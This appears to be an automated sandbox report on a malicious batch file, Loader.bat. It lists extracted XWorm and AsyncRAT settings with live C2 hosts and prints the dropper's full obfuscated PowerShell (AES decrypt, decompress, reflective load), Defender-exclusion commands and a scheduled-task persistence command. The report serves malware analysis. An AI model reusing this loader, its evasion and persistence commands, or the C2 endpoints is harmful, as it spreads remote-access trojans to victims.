Analysis

  • max time kernel
    1045s
  • max time network
    1053s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/07/2024, 20:52

General

  • Target

    Loader.bat

  • Size

    192KB

  • MD5

    a94e4dec22b09ea37e33fdfa3638e5de

  • SHA1

    f90c1ea98c741bc63a3260721d1974962b9241ce

  • SHA256

    bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4

  • SHA512

    a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b

  • SSDEEP

    3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c

Malware Config

Extracted

Family

xworm

C2

unique-emotions.gl.at.ply.gg:54742

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

card-buzz.gl.at.ply.gg:2497

Mutex

rotrzgmheqhT

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 41 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 18 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:5016
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Users\Admin\AppData\Local\Temp\Update.exe
          "C:\Users\Admin\AppData\Local\Temp\Update.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3012
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3912
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1348
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2348
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4104
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1520
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1184
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:620
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3384
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:216
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4860
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3408
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3464
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3716
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4792
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      01d89dd05c27325bbfe34d7a2bc716ad

      SHA1

      fa0a5ce95e7e989da44face5a736172aba834ddc

      SHA256

      52bf1aacc2b2f03b2bbdca40b7eff5e041c8f2892575b3bf5cbaa000a02f71e9

      SHA512

      d7500eae5877d297fec543b607a1e6764ac07002178e92306de9b5a9cc76d9f42cdaa9a2b086ed1d3174c660afa120228affa80a4fb1ac4a430f7028449e0adb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      083782a87bd50ffc86d70cbc6f04e275

      SHA1

      0c11bc2b2c2cf33b17fff5e441881131ac1bee31

      SHA256

      7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

      SHA512

      a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

    • C:\Users\Admin\AppData\Local\Temp\Update.exe

      Filesize

      59KB

      MD5

      07ac8571846ca0cc9f6fcdbe1d000be2

      SHA1

      3cbe16f7d24d40b590f97b1999c64c5bb889e8c6

      SHA256

      2a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5

      SHA512

      56413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2bydf0a.a4t.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1556-94-0x00007FFDA8090000-0x00007FFDA8B51000-memory.dmp

      Filesize

      10.8MB

    • memory/1556-93-0x00007FFDA8093000-0x00007FFDA8095000-memory.dmp

      Filesize

      8KB

    • memory/1556-90-0x000000001C0C0000-0x000000001C0CE000-memory.dmp

      Filesize

      56KB

    • memory/1556-84-0x00007FFDA8090000-0x00007FFDA8B51000-memory.dmp

      Filesize

      10.8MB

    • memory/1556-40-0x0000000000310000-0x0000000000326000-memory.dmp

      Filesize

      88KB

    • memory/1556-39-0x00007FFDA8093000-0x00007FFDA8095000-memory.dmp

      Filesize

      8KB

    • memory/1952-28-0x0000000007AE0000-0x0000000007AF2000-memory.dmp

      Filesize

      72KB

    • memory/1952-7-0x0000000005FD0000-0x0000000006036000-memory.dmp

      Filesize

      408KB

    • memory/1952-22-0x0000000007F60000-0x00000000085DA000-memory.dmp

      Filesize

      6.5MB

    • memory/1952-23-0x00000000078E0000-0x00000000078FA000-memory.dmp

      Filesize

      104KB

    • memory/1952-24-0x0000000007A00000-0x0000000007A08000-memory.dmp

      Filesize

      32KB

    • memory/1952-25-0x0000000007A20000-0x0000000007A4C000-memory.dmp

      Filesize

      176KB

    • memory/1952-0-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

      Filesize

      4KB

    • memory/1952-20-0x0000000006980000-0x00000000069C4000-memory.dmp

      Filesize

      272KB

    • memory/1952-19-0x0000000006590000-0x00000000065DC000-memory.dmp

      Filesize

      304KB

    • memory/1952-18-0x0000000006550000-0x000000000656E000-memory.dmp

      Filesize

      120KB

    • memory/1952-1-0x0000000003060000-0x0000000003096000-memory.dmp

      Filesize

      216KB

    • memory/1952-17-0x0000000006060000-0x00000000063B4000-memory.dmp

      Filesize

      3.3MB

    • memory/1952-6-0x0000000005F60000-0x0000000005FC6000-memory.dmp

      Filesize

      408KB

    • memory/1952-21-0x0000000007660000-0x00000000076D6000-memory.dmp

      Filesize

      472KB

    • memory/1952-5-0x0000000005680000-0x00000000056A2000-memory.dmp

      Filesize

      136KB

    • memory/1952-85-0x0000000007E90000-0x0000000007F2C000-memory.dmp

      Filesize

      624KB

    • memory/1952-86-0x0000000008B90000-0x0000000009134000-memory.dmp

      Filesize

      5.6MB

    • memory/1952-87-0x00000000722D5000-0x00000000722D6000-memory.dmp

      Filesize

      4KB

    • memory/1952-88-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

      Filesize

      4KB

    • memory/1952-89-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-4-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-92-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-3-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-2-0x0000000005800000-0x0000000005E28000-memory.dmp

      Filesize

      6.2MB

    • memory/2380-41-0x000002836EA30000-0x000002836EA52000-memory.dmp

      Filesize

      136KB